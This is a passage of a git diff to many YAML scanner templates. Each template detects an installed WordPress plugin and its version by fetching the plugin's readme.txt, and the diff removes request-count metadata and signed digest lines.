'(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022053e226dc1875be394d1fe508d69cd193db7c36ea14dc7e07cfb33647c3dfea4b022100c3d4e45d9a1c8d392428ff6f2074118046f9c52a3ff1a6f43579376f68971bcb:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 6f183581e4..96b4699d2d 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: - max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/sg-security/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502210084cd2ae301865308d835c045857e4d9913ef3355ca4d02a6b1a4fc93afd5bd0802203e2b6cd031ca4286dfae68874ab03632f06fb29b385a0707e90788c6e9a05934:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 93104c43f2..17584cd064 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: - max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/shortcodes-ultimate/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100d89901d9658fbbf6a9f23330cef9969cefa9dca7c2a42749cac2f1b8d95a6a2f022100bc3889a7563a615364bd1635ddd03654a1e97a8c637a722d495026731963ef37:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 6250e9ee57..015fb97043 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: - max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/shortpixel-image-optimiser/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402205854dc0952785ebb67b72e8091830573734a8906d9c0ffaa08909d1616b6d9a702200f16a97eb4025962985b24a87fa0b0cde842852c0a8d138a0235b2ab5b1f3192:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 90f3b4072b..1d5224b457 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: - max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/simple-custom-post-order/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502202a533b53eb2c7c8b293c573ddb3d0071839d3db629747667072b9c816cecc2fa02210097403f31dc4a8287c726ec707b58075f5f5ff1db21cb18135b4490f34862d499:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 36051b4f5a..aafd6c6a38 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: - max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/siteguard/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220195b48836cb5ae402e48b6e718b5c9595a99513a65e2fe011a14698ff720293002205a17437a6692764ed707481ea2715ef9af1761b6a9685a3cb75ba1ef48bfc98a:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 1863d18876..e10ab985da 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: - max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/siteorigin-panels/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502207a862d418cf39b15303b742820620e632584309d182566ceadbb4972a6137456022100ffbdf216c359ca51a54cc2dca24f48fa7c1eb3948b664020d01e78022c39c278:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index b8ddb0fdda..9881b591ae 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: - max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/smart-slider-3/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220407acda8b901172b842a0aa733aed35ff08951238d2b051a3a0172ffc92e5fc10220034b427b9cfb754021621fa0c1a5202cb969278ae15f6d85dc9f333a0752db71:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index d3076d1f06..69c367b8d5 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: - max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/so-widgets-bundle/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022036d8d0c8b9231ca9ea742d1c6afe3e671d5e2414accf6aec46f4398e6cf52e4202200c2cd82730ae1eafd15fa72fc6a3b9f9694f4957dabed4a84988c95cff322947:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 2782800af3..26d525386b 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: - max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/stops-core-theme-and-plugin-updates/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502205d989906a2bcc4c842021793901fc55b743a841cadb013b035a1b71ed465dcf7022100d27846089dfc97958aaf85d8a9317d7c063a3316fcd95db8d166f17b34f79661:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 4e137bb0d7..3920c5cf56 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: - max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/sucuri-scanner/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221008917ed1c9ecba55098aa550f29809563d07eaf4c76b2eed196444c01721a99e50220577a0c816d14377d802dfc7e22eb27a68f0afc10fc85c399801ad025352cc25c:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index 3d9078f04a..f556786f5a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: - max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/svg-support/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a0048304602210089e435f4d65f47ca89dde3642c198955990cc15b75c5e793bd8b72309954b711022100963c4694fea05ed8b2c5771695b5a56f6138eaaeed604bb794d4eb49f5507edd:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index ea886e8577..844e3d19a0 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: - max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/table-of-contents-plus/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220381191727f79b8c5f4b9afbd61fbd1e3941305d6b7102f1101f414e615f1ac4702200f1715e434828ce7f19690b590ab65eddbfc497ddb61818550abf3d82bb5ffa0:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 7a10084ddb..eb0f02f602 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: - max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/tablepress/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221009ea3a0085471c891f7280d94d63a22b72cf1e8cd6ba0956f106350d6acdb8cb00221009a7e98ac678549e8ebce2481d2dd3c85349f08950c9b06ca242eb71f95790cfb:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 48e13c3cea..755efd53fa 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: - max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/taxonomy-terms-order/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100d4433d94b0d07d384f830a91ad6276ddec713fb58f03a32c046accb7e31daf2502200e5a7f5d72e90f54b6e3899eb11e742b5c286de60b7828447436c65e94ebe4e8:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 7b163536fe..0403bb4e72 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: - max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/the-events-calendar/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022036693e085e968b5beb48061c642b19d88dad28bed4df7bd1eb3489d2089ffd1802203807cf0231b1f4c21262395b2799bb975491174e2ff6c915cc013db4ad7912cd:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 2aef06a40e..b5f8b822c7 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: - max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/tinymce-advanced/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022034a1ca4ed9a36c0b698215d378726f9c7d51b8f4f5f1c0cb28178887c4a0faaf022100936d47fac597215334bb110054a35285cd999fe29d0a118b6a32280523865599:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 72cd4db8e7..85aaf7ff16 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: - max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/translatepress-multilingual/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220172f700ac46ab8ca77d60b2f693ef47c82dc2cf92c58956e5e9478df563c1028022100ac6a3ae5025e04125f2e5c94fa0f0b2b0d0c6e4230a98dad0b6c831f86cf3b28:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index cb726a8ddf..0af322b728 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: - max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/ultimate-addons-for-gutenberg/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502205984ba6683aa60b03f4575c8de8bd976085074f0f3ebb929b580a2ccdf0d21f3022100fdb040a5327440b4527b8dcf6434db3a4f8a2ee4ad0d90bf07d7e12de653e2c5:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index cc51489638..d4ac0d179e 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: - max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/under-construction-page/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100cb725c882854c997fa20a6a2236ac88d632fc6ff2c7d2c49efcbb618a298c0b5022100a5c0e70504811b3d4f1c8eb735f9e17706e01611946cb1d2dcf57da9a7e244ef:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index cc26936563..dbbadf3cfc 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: - max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/updraftplus/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100cc2c426ff249158e0af3506e810f8d49e8cba3ca5aed1dea860c7ffd4a5535c7022100d4cb0d51531d9b10810d2ac70cba561af58f75fd4961cf6d02c3b80b2c7110b7:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index 0c6b1cd512..401b0e479f 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: - max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/use-any-font/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100feee225df5987fb13a239559259317ab6d4a6a7d5b93cc09a5fcdfb62219cbff022100b79e9ece46f793d8c9356fd83fa2c7d212e82d11e0f2019fb432303a9049878a:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 696dfe4eac..6f95506748 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: - max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/user-role-editor/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221009dbbeddf29102b76d91af49f6e831584f3f3acd81f5ce7d0a4058b3a9888ab0802201f0abb380c7771a5c3547906e51f62f9350cd0c648475b345b2c17e3f945c04c:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 37526d6dab..4404f87aab 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: - max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/velvet-blues-update-urls/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100d07d54e6ffde38c146dad7770255c5b64aee3e122312c5239bb3fc17fb60e9140221009c654e214e71184d3ca6d00b2493326cf3c84130a261b3479f4af42145cddd4f:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 9489733d87..8995434fce 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: - max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/w3-total-cache/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502200a7a68fa9af792a76f23b524739ab02ed74ffcfb48fed5482587f3f36723fa85022100eb098731a2a49416d5ddd019bdc26cee997d20aca63f98b998307676361ac543:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 64aeee576f..8175806cb8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: - max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402201a99ec3bce8c650d061ea0ed424667b8450a03111df3450059b8cead3feea8d402206f61693984682d7ef02c352eb2a8e959dbe851beb53a69347e9801ea3424d8bb:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 7b8e8f691e..db82bc7f43 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: - max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/webp-express/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022064238228663808fafa136b505ba237c2431387132ac9743ae32aa392e8c31b71022100cfc6bb77e55acff074103e954b4a9627e738a0bb0403c06b64890bdc59d23ff5:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index baeb422731..03ddae57bc 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: - max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/widget-importer-exporter/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100c0e0ba96241210d7f381daf4f05dfe8de3cf2996448bb535acaa410e72a55d8e022043c7e7793ac3abfc006ee63844fb7910aebcb08be168d4ff5cfb955fdfedb1a0:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index df61aa6658..d6449bb5bf 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: - max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/woo-cart-abandonment-recovery/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402200c0078a050c17d4a15f26b48424afaa84479a4c75ff945f1c0dac657992fa72202203a53e15f794a2c13935f6c218584699c6c288e5721d3183e955865b423e2bf7a:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 7d3dee1ce4..2d5fdf1779 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: - max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/woo-checkout-field-editor-pro/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402200f33fe32810c4a9d1d59491a2c5997388791a8c56de9b7b1bafaf8bd610f4c7b02200c9d8011591477d2d38e75279291e85d91713b59987b7c36c8caaf23c176c396:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 57a47093f0..6b5705e20d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: - max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/woo-variation-swatches/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402205db61d7a6b4b5bcd9966e5c811487789fa9ea84f0b2f56ca15cfe0b105cf4b1202200af4c455337806f7a402934211dc6f686d9bf5c9565d376f7b5e962473bb46a6:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index 3e4ac1178c..dbcdb64bad 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout 